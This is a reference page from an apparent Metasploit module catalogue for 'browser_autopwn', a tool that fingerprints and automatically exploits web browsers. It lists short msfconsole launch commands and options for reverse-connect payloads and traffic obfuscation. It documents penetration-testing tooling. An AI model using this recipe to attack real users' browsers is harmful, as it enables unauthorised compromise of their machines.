HTTP Client Automatic Exploiter | Metasploit Exploit Database (DB)

HTTP Client Automatic Exploiter

This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply prints the names of all exploit modules that would be used by the WebServer action given the current MATCH and EXCLUDE options. Also adds a 'list' command which is the same as running with ACTION=list.

Search Other Modules


Rank

  • Normal

Authors

  • egypt < egypt [at] metasploit.com >

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST [MY IP ADDRESS]
msf auxiliary(browser_autopwn) > run


Module Options

LHOST The IP address to use for reverse-connect payloads
SRVHOST The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0)
SRVPORT The local port to listen on. (default: 8080)
SSL Negotiate SSL for incoming connections
SSLCert Path to a custom SSL certificate (default is randomly generated)
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH The URI to use for this exploit (default is random)
AutoRunScript A script to automatically on session creation.
AutoSystemInfo Automatically capture system information on initialization.
DEBUG Do not obfuscate the javascript and print various bits of useful info to the browser
EXCLUDE Only attempt to use exploits whose name DOES NOT match this regex
LPORT_GENERIC The port to use for generic reverse-connect payloads
LPORT_JAVA The port to use for Java reverse-connect payloads
LPORT_LINUX The port to use for Linux reverse-connect payloads
LPORT_MACOS The port to use for Mac reverse-connect payloads
LPORT_WIN32 The port to use for Windows reverse-connect payloads
ListenerComm The specific communication channel to use for this service
MATCH Only attempt to use exploits whose name matches this regex
PAYLOAD_GENERIC The payload to use for generic reverse-connect payloads
PAYLOAD_JAVA The payload to use for Java reverse-connect payloads
PAYLOAD_LINUX The payload to use for Linux reverse-connect payloads
PAYLOAD_MACOS The payload to use for Mac reverse-connect payloads
PAYLOAD_WIN32 The payload to use for Windows reverse-connect payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
HTML::base64 Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding Enable folding of HTTP headers
HTTP::junk_headers Enable insertion of random junk HTTP headers
HTTP::server_name Configures the Server header of all outgoing replies
TCP::max_send_size Maximum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)